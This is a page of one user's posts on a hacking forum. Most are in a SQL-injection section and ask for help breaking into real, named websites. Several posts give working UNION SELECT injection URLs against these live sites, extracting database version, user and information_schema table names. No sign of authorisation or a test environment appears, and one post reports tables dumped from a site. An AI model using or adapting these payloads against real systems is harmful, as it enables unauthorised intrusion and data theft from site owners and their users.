Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Current Page: 1 of 1
Results 1 - 13 of 13
4 years ago
hoahongtim
try : http://www.sflcn.com/story.php?id=-6761+union+/**/select/**/+0,1,version(),3,user(),5,6,7
Forum: SQL and Code Injection
4 years ago
hoahongtim
can you post method exploit by cpanel ? thanks !
Forum: Full Disclosure
4 years ago
hoahongtim
Please help me, how to method to exploit MSSSQL in CFM .... Demo : http://www.rtca.org/comm/Committee.cfm?id=130 Thanks !
Forum: SQL and Code Injection
5 years ago
hoahongtim
hmm, it very difficult to exploit. thanks Reiners for help but i can not exloit it. i put order by xxx, but error the same ...
Forum: SQL and Code Injection
5 years ago
hoahongtim
@Kyo i don't undersrand, you can for me a example ... using above link ... thanks
Forum: SQL and Code Injection
5 years ago
hoahongtim
How to injection with this error : Search Results for "\" You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') AND display_category_accessories.a_id_rel = products_accessories.a_id ' at line 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for th
Forum: SQL and Code Injection
5 years ago
hoahongtim
if website using mysqli, you can excute multi query, but with mysql that could not !
Forum: SQL and Code Injection
5 years ago
hoahongtim
Link demo : https://evesbliss.com/cart.php?type=cat&cat=7830 I find site have : 33 columns, but when I inject by : https://evesbliss.com/cart.php?type=cat&cat=7830%20AND%201=0%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33-- I could not find vul column...with this vul, how to injection ? thanks many ! MYSQL ERR
Forum: SQL and Code Injection
5 years ago
hoahongtim
Link for test ? Please !
Forum: SQL and Code Injection
5 years ago
hoahongtim
Good man ! Thanks many ! :)
Forum: SQL and Code Injection
5 years ago
hoahongtim
i found site error sql : http://www.truongthgt.com/thongbao.asp?tt=52' but exploit can't see any column :(
Forum: SQL and Code Injection
5 years ago
hoahongtim
i exploit this site : http://musicland.com.vn/index.php?act=news&ID=45%20union%20select%20group_concat(table_name),1,1,1,1,1,1%20from%20information_schema.tables-- i get alot of tables : CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGER
Forum: SQL and Code Injection
5 years ago
hoahongtim
i exploit this site : http://www.ft-pharma.com.vn/index.php?pg=sanpham&task=chitiet&id=11%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13-- i known, it have 14 column. so, i exploit by : http://www.ft-pharma.com.vn/index.php?pg=sanpham&task=chitiet&id=11 union select @@version,2,3,4,5,6,7,8,9,10,11,12,13,14-- i changes many function as : version(), user(), database() ...
Forum: SQL and Code Injection
Current Page: 1 of 1